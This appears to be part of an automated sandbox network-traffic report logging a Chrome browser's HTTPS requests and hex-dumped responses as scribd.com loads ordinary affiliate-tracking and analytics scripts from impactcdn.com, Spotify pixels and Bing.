                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 22 3d 3d 3d 74 2e 61 63 74 69 6f 6e 7d 29 29 7c 7c 74 2e 65 76 65 6e 74 73 2e 70 75 73 68 28 61 29 7d 29 29 7d 69 66 28 30 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 66 3d 71 2e 70 61 67 65 3b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 69 64 3d 3d 3d 66 26 26 28 48 3d 48 2e 63 6f 6e 63 61 74 28 74 2e 65 76 65 6e 74 73 29 29 7d 29 29 3b 76 61 72 20 6c 3d 6e 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 7b 70 69 78 65 6c 5f 69 64 3a 68 28 22 6b 65 79 22 29 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 7b 75 69 64 3a 71 2e 75 73 65 72 2c 74 69 6d 65 3a 73 28 29 2c 70 69 78 65 6c 5f 76 65 72 73 69 6f 6e 3a 22 22 2e 63 6f 6e 63 61 74 28 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "===t.action}))||t.events.push(a)}))}if(0===n.length)return!1;var f=q.page;n.forEach((function(t){t.pid===f&&(H=H.concat(t.events))}));var l=n.map((function(t){var n={pixel_id:h("key")};return Object.assign(t,{uid:q.user,time:s(),pixel_version:"".concat("
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 6f 2e 63 61 6c 6c 28 72 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6f 3b 73 77 69 74 63 68 28 72 3d 30 2c 6f 26 26 28 75 3d 5b 32 26 75 5b 30 5d 2c 6f 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 6f 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 63 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 63 2e 6c 61 62 65 6c 2b 2b 2c 72 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 75 3d 63 2e 6f 70 73 2e 70 6f 70 28 29 2c 63 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 64 65 66 61 75 6c 74 3a 69 66 28 21 28 6f 3d 63 2e 74 72 79 73 2c 28 6f 3d 6f 2e 6c 65 6e 67 74 68
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: o.call(r,u[1])).done)return o;switch(r=0,o&&(u=[2&u[0],o.value]),u[0]){case 0:case 1:o=u;break;case 4:return c.label++,{value:u[1],done:!1};case 5:c.label++,r=u[1],u=[0];continue;case 7:u=c.ops.pop(),c.trys.pop();continue;default:if(!(o=c.trys,(o=o.length


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        82192.168.2.164982135.186.249.724436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC381OUTGET /A3071581-5350-42cd-80be-79cdd173e0991.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: utt.impactcdn.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC907INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public,max-age=900,s-maxage=300
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 06 Dec 2024 22:04:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 25 Sep 2024 15:36:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: W/"3773b183e96099d1e7bb885c5297c6ae"
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-generation: 1727278589342188
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-length: 19233
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: crc32c=PBtjng==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: md5=N3Oxg+lgmdHnu4hcUpfGrg==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-storage-class: MULTI_REGIONAL
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-Response-Body-Transformations: gunzipped
                                                                                                                                                                                                                                                                                                                                                                                        Warning: 214 UploadServer gunzipped
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC756I_nAFeh4UC42jPRPnWgfArjUgVUOT-7eG5jDRKWwFfgEqGzFZPTna0YIwiw_7vnhl2v2yrRmw
                                                                                                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 31 61 35 65 0d 0a 2f 2a 21 20 40 62 75 69 6c 64 20 38 34 61 38 63 37 31 30 20 40 64 61 74 65 20 32 30 32 34 2d 30 39 2d 32 30 54 31 36 3a 35 39 3a 34 37 2e 36 30 36 5a 20 40 67 65 6e 65 72 61 74 65 64 20 32 30 32 34 2d 30 39 2d 32 35 54 31 35 3a 33 36 3a 32 39 2e 32 32 37 30 35 34 36 37 33 5a 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 7b 38 37 31 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 76 61 72 20 61 3d 72 28 39 38 31 34 29 2c 66 3d 72 28 39 34 30 32 29 2c 64 3d 72 28 38 39 35 36 29 2c 6c 3d 72 28 34 32 36 29 2c 73 3d 72 28 35 34 32 33 29 2c 6d 3d 72 28 34 35 30 29 2e 74 2c 76 3d 72 28 31 35 33 37 29 2e 69 3b 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 63 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1a5e/*! @build 84a8c710 @date 2024-09-20T16:59:47.606Z @generated 2024-09-25T15:36:29.227054673Z */!function(){"use strict";var r={8714:function(n,t,r){var a=r(9814),f=r(9402),d=r(8956),l=r(426),s=r(5423),m=r(450).t,v=r(1537).i;n.exports=function(i,c){v
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 20 65 3d 61 28 72 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 6c 28 72 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3b 65 28 6e 29 2c 6f 2e 4e 2e 56 28 72 2c 5b 21 21 6e 7c 7c 6e 75 6c 6c 5d 29 2c 6d 3d 21 31 2c 73 2e 6c 65 6e 67 74 68 26 26 28 74 3d 73 2e 73 68 69 66 74 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 28 74 5b 30 5d 2c 74 5b 31 5d 29 7d 2c 30 29 29 7d 29 7d 63 28 72 2c 68 2e 54 29 7d 2c 70 3d 30 2c 58 3d 64 2e 6c 65 6e 67 74 68 3b 70 3c 58 3b 2b 2b 70 29 63 28 64 5b 70 5d 2c 68 2e 44 29 2c 76 28 64 5b 70 5d 2c 5b 5d 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 2c 74 3d 6e 2e 73 68 69 66 74 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e=a(r);return void l(r,n,function(n){var t;e(n),o.N.V(r,[!!n||null]),m=!1,s.length&&(t=s.shift(),setTimeout(function(){v(t[0],t[1])},0))})}c(r,h.T)},p=0,X=d.length;p<X;++p)c(d[p],h.D),v(d[p],[]);return function(){var n=[].slice.call(arguments),t=n.shift(
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 59 31 78 63 4c 6e 52 79 59 57 52 6c 64 48 4a 68 59 32 74 6c 63 6e 78 68 62 6e 4a 6b 62 32 56 36 63 6e 4e 38 62 47 52 31 61 48 52 79 63 48 78 6b 63 47 4a 76 62 48 5a 33 66 48 46 72 63 33 4a 32 4b 56 78 63 4c 6d 35 6c 64 48 78 69 64 58 6c 63 58 43 35 6e 5a 57 35 70 58 46 77 75 64 58 4d 6b 49 69 77 69 65 6a 46 79 49 6a 6f 69 4b 47 64 76 58 46 77 75 57 32 45 74 65 6b 45 74 57 6a 41 74 4f 56 30 75 4b 6a 39 63 58 43 35 6a 62 32 30 6f 58 46 77 76 50 79 6c 63 58 44 39 70 5a 44 31 62 4d 43 30 35 58 53 34 72 50 31 68 62 4d 43 30 35 58 53 34 72 50 79 59 70 66 43 68 68 62 57 46 36 62 32 35 63 58 43 35 63 58 46 4d 71 50 31 78 63 4c 79 68 6b 63 48 78 6e 63 43 6c 63 58 43 39 63 58 46 4d 71 50 33 52 68 5a 7a 30 70 66 43 68 68 62 57 46 36 62 32 35 63 58 43 35 63 58 46 4d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Y1xcLnRyYWRldHJhY2tlcnxhbnJkb2V6cnN8bGR1aHRycHxkcGJvbHZ3fHFrc3J2KVxcLm5ldHxidXlcXC5nZW5pXFwudXMkIiwiejFyIjoiKGdvXFwuW2EtekEtWjAtOV0uKj9cXC5jb20oXFwvPylcXD9pZD1bMC05XS4rP1hbMC05XS4rPyYpfChhbWF6b25cXC5cXFMqP1xcLyhkcHxncClcXC9cXFMqP3RhZz0pfChhbWF6b25cXC5cXFM
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 30 75 4b 6c 78 63 59 6e 42 31 59 6a 31 62 58 46 78 6b 4b 31 30 71 58 46 78 69 4b 56 78 63 55 79 6f 70 66 43 67 6f 5a 57 4a 68 65 56 78 63 4c 69 6c 63 58 46 4d 71 4b 47 31 72 59 32 6c 6b 4a 54 4e 45 4b 56 78 63 55 79 6f 6f 62 57 74 79 61 57 51 6c 4d 30 52 62 4d 43 30 35 58 46 77 74 58 53 6f 70 58 46 78 54 4b 69 67 6c 4d 6a 5a 6a 59 57 31 77 61 57 51 6c 4d 30 52 62 4d 43 30 35 58 53 6f 70 58 46 78 54 4b 69 6c 38 4b 43 68 7a 63 47 6c 75 5a 47 78 6c 62 57 46 30 64 48 4a 6c 63 33 4e 38 64 32 39 79 62 47 52 33 61 57 52 6c 59 33 6c 6a 62 47 56 79 65 58 78 30 61 47 56 6e 63 6d 46 32 61 58 52 35 59 32 46 79 64 47 56 73 66 48 5a 6c 63 6d 52 6c 59 6d 6c 72 5a 58 4e 38 5a 32 46 6e 5a 32 6c 68 5a 47 6c 79 5a 57 4e 30 66 47 4e 76 59 6d 39 6a 59 6d 52 38 62 47 56 68 5a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0uKlxcYnB1Yj1bXFxkK10qXFxiKVxcUyopfCgoZWJheVxcLilcXFMqKG1rY2lkJTNEKVxcUyoobWtyaWQlM0RbMC05XFwtXSopXFxTKiglMjZjYW1waWQlM0RbMC05XSopXFxTKil8KChzcGluZGxlbWF0dHJlc3N8d29ybGR3aWRlY3ljbGVyeXx0aGVncmF2aXR5Y2FydGVsfHZlcmRlYmlrZXN8Z2FnZ2lhZGlyZWN0fGNvYm9jYmR8bGVhZ
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1198INData Raw: 58 53 70 63 58 43 39 30 58 46 77 76 57 7a 41 74 4f 56 30 71 4b 58 77 6f 61 47 39 33 62 46 78 63 4c 6d 31 6c 58 46 77 76 66 48 4e 6f 62 33 41 74 62 47 6c 75 61 33 4e 63 58 43 35 6a 62 31 78 63 4c 33 78 7a 61 47 39 77 4c 57 56 6b 61 58 52 7a 58 46 77 75 59 32 39 63 58 43 38 70 4b 43 68 63 58 47 52 37 4d 54 6c 39 4b 58 78 62 4d 43 30 35 59 53 31 36 51 53 31 61 58 58 73 78 4d 58 31 38 62 47 6c 75 61 79 6c 38 4b 48 4e 6a 63 6d 6c 77 64 48 4e 63 58 43 35 68 5a 6d 5a 70 62 47 6c 68 64 47 56 6d 64 58 52 31 63 6d 56 63 58 43 35 6a 62 32 31 63 58 43 39 42 52 6b 4e 73 61 57 4e 72 58 46 77 75 59 58 4e 77 4b 53 74 63 58 46 4d 71 4b 47 46 6d 5a 6d 6c 73 61 57 46 30 5a 55 6c 45 50 56 78 63 5a 43 73 70 66 46 34 75 4b 69 67 2f 50 53 35 69 64 47 46 6e 50 53 6b 75 4b 69 67
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: XSpcXC90XFwvWzAtOV0qKXwoaG93bFxcLm1lXFwvfHNob3AtbGlua3NcXC5jb1xcL3xzaG9wLWVkaXRzXFwuY29cXC8pKChcXGR7MTl9KXxbMC05YS16QS1aXXsxMX18bGluayl8KHNjcmlwdHNcXC5hZmZpbGlhdGVmdXR1cmVcXC5jb21cXC9BRkNsaWNrXFwuYXNwKStcXFMqKGFmZmlsaWF0ZUlEPVxcZCspfF4uKig/PS5idGFnPSkuKig
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC1390INData Raw: 31 30 30 30 0d 0a 5b 30 5d 3a 6e 75 6c 6c 3b 69 66 28 21 69 29 72 65 74 75 72 6e 20 6e 28 63 28 29 29 3b 74 2e 76 2e 41 28 69 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 5b 31 5d 3f 65 5b 31 5d 3a 7b 7d 29 2c 6e 28 29 7d 7d 2c 39 37 39 30 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 65 78 70 6f 72 74 73 3d 7b 4f 3a 22 61 63 74 69 6f 6e 22 2c 44 3a 22 63 61 6c 6c 65 64 22 2c 55 3a 22 63 61 6e 63 65 6c 6c 65 64 22 2c 54 3a 22 63 6f 6d 70 6c 65 74 65 64 22 2c 42 3a 22 65 72 72 6f 72 65 64 22 2c 4b 3a 22 71 75 65 75 65 64 22 2c 47 3a 22 72 65 61 64 79 22 2c 57 3a 22 73 74 61 72 74 65 64 22 2c 4d 3a 22 77 61 72 6e 65 64 22 7d 7d 2c 39 33 34 30 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 65 78 70 6f 72 74 73 3d 7b 5f 3a 33 2c 6e 6e 3a 32 2c 74 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1000[0]:null;if(!i)return n(c());t.v.A(i,"object"==typeof e[1]?e[1]:{}),n()}},9790:function(n){n.exports={O:"action",D:"called",U:"cancelled",T:"completed",B:"errored",K:"queued",G:"ready",W:"started",M:"warned"}},9340:function(n){n.exports={_:3,nn:2,tn
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1390INData Raw: 72 28 31 34 36 30 29 2c 69 3d 72 28 39 37 39 30 29 2c 63 3d 72 28 34 35 30 29 2e 74 2c 75 3d 7b 7d 3b 75 5b 65 2e 5f 5d 3d 69 2e 54 2c 75 5b 65 2e 6e 6e 5d 3d 69 2e 54 2c 75 5b 65 2e 74 6e 5d 3d 69 2e 4d 2c 75 5b 65 2e 43 5d 3d 69 2e 42 2c 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 28 74 2c 69 2e 57 2c 6e 7c 7c 7b 7d 29 2c 63 28 65 3f 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 5b 65 5d 28 74 2c 75 5b 28 6e 7c 7c 7b 7d 29 2e 7a 31 6d 5d 7c 7c 69 2e 54 2c 6e 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 72 5b 6e 2e 7a 31 6d 5d 28 74 2c 75 5b 6e 2e 7a 31 6d 5d 7c 7c 69 2e 54 2c 6e 29 3a 72 28 74 2c 69 2e 54 29 7d 29 7d 7d 7d 2c 31 34 36 30 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r(1460),i=r(9790),c=r(450).t,u={};u[e._]=i.T,u[e.nn]=i.T,u[e.tn]=i.M,u[e.C]=i.B,n.exports=function(r,e){return function(t,n){return r(t,i.W,n||{}),c(e?function(n){r[e](t,u[(n||{}).z1m]||i.T,n)}:function(n){n?r[n.z1m](t,u[n.z1m]||i.T,n):r(t,i.T)})}}},1460:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1324INData Raw: 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 2d 31 3c 78 2e 69 6e 64 65 78 4f 66 28 6e 29 26 26 28 69 5b 6e 5d 3d 6d 2e 62 6e 5b 6e 5d 29 3b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 69 66 28 6e 29 72 65 74 75 72 6e 21 30 21 3d 3d 6e 26 26 28 65 28 6e 29 2c 6e 2e 7a 31 33 2e 7a 31 39 29 26 26 28 69 2e 7a 31 39 3d 6e 2e 7a 31 33 2e 7a 31 39 29 2c 6c 2e 68 2e 77 6e 2e 79 6e 28 75 2c 69 2c 66 2c 72 29 3b 21 73 2e 43 6e 2e 24 6e 28 29 26 26 74 2e 66 70 63 26 26 73 2e 43 6e 2e 46 6e 28 74 2e 66 70 63 29 2c 76 28 74 2e 74 70 73 29 2c 73 2e 6b 6e 28 29 26 26 6c 2e 4e 2e 5a 6e 28 58 2e 53 2c 5b 6f 2c 73 2e 43 6e 2e 52 6e 28 29 2c 73 2e 74 73 2c 61 2e 7a 6a 5d 29 2c 73 2e 59 6e 28 6f 2c 61 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .hasOwnProperty(n)&&-1<x.indexOf(n)&&(i[n]=m.bn[n]);var c=function(n,t){if(n)return!0!==n&&(e(n),n.z13.z19)&&(i.z19=n.z13.z19),l.h.wn.yn(u,i,f,r);!s.Cn.$n()&&t.fpc&&s.Cn.Fn(t.fpc),v(t.tps),s.kn()&&l.N.Zn(X.S,[o,s.Cn.Rn(),s.ts,a.zj]),s.Yn(o,a),setTimeout(f
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1390INData Raw: 31 30 30 30 0d 0a 22 22 29 2c 21 75 2e 74 65 73 74 28 6e 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 61 69 6c 65 64 20 74 6f 20 65 78 65 63 75 74 65 20 27 61 74 6f 62 27 20 6f 6e 20 27 57 69 6e 64 6f 77 27 3a 20 54 68 65 20 73 74 72 69 6e 67 20 74 6f 20 62 65 20 64 65 63 6f 64 65 64 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 6c 79 20 65 6e 63 6f 64 65 64 2e 22 29 3b 6e 2b 3d 22 3d 3d 22 2e 73 6c 69 63 65 28 32 2d 28 33 26 6e 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 74 2c 72 2c 65 2c 69 3d 22 22 2c 63 3d 30 3b 63 3c 6e 2e 6c 65 6e 67 74 68 3b 29 74 3d 6f 2e 69 6e 64 65 78 4f 66 28 6e 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 3c 3c 31 38 7c 6f 2e 69 6e 64 65 78 4f 66 28 6e 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 3c 3c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1000""),!u.test(n))throw new TypeError("Failed to execute 'atob' on 'Window': The string to be decoded is not correctly encoded.");n+="==".slice(2-(3&n.length));for(var t,r,e,i="",c=0;c<n.length;)t=o.indexOf(n.charAt(c++))<<18|o.indexOf(n.charAt(c++))<<
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1390INData Raw: 65 64 7c 7c 2d 31 3c 69 2e 56 6e 28 74 2c 72 29 7c 7c 65 2e 70 75 73 68 28 63 28 72 29 2b 22 3d 22 2b 63 28 6e 5b 72 5d 29 29 3b 72 65 74 75 72 6e 20 65 7d 3b 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 2c 65 29 7b 76 61 72 20 69 3d 65 5b 30 5d 7c 7c 7b 7d 2c 65 3d 65 5b 31 5d 7c 7c 7b 7d 2c 63 3d 72 2e 70 6e 28 69 2e 63 61 6d 70 61 69 67 6e 49 64 7c 7c 72 2e 45 6e 28 29 29 7c 7c 7b 7d 2c 63 3d 66 28 7b 6f 72 67 3a 69 2e 6f 72 67 49 64 7c 7c 63 2e 66 71 7c 7c 22 6e 6f 74 5f 73 65 74 22 2c 72 74 3a 69 2e 72 65 71 75 65 73 74 54 79 70 65 7c 7c 22 63 6c 69 63 6b 22 2c 70 3a 69 2e 73 6f 75 72 63 65 49 64 7c 7c 72 2e 6a 6e 28 63 2e 69 77 7c 7c 33 30 29 7c 7c 75 6e 64 65 66 69 6e 65 64 2c 73 6c 3a 69 2e 73 63 6f 72 65 7c 7c 30 2c 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ed||-1<i.Vn(t,r)||e.push(c(r)+"="+c(n[r]));return e};n.exports=function(n,t,r,e){var i=e[0]||{},e=e[1]||{},c=r.pn(i.campaignId||r.En())||{},c=f({org:i.orgId||c.fq||"not_set",rt:i.requestType||"click",p:i.sourceId||r.jn(c.iw||30)||undefined,sl:i.score||0,r


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        83192.168.2.164982235.186.224.244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC510OUTOPTIONS /v1/ingest HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: pixels.spotify.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:36 UTC321INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-headers: content-type
                                                                                                                                                                                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        date: Fri, 06 Dec 2024 21:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        Via: HTTP/2 edgeproxy, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        84192.168.2.1649823150.171.28.104436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC342OUTGET /bat.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private,max-age=1800
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 51385
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 16 Oct 2024 22:47:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "028e0691d20db1:0"
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 447D5B1F02FF454F9EB177026CF00C12 Ref B: EWR30EDGE0917 Ref C: 2024-12-06T21:59:37Z
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
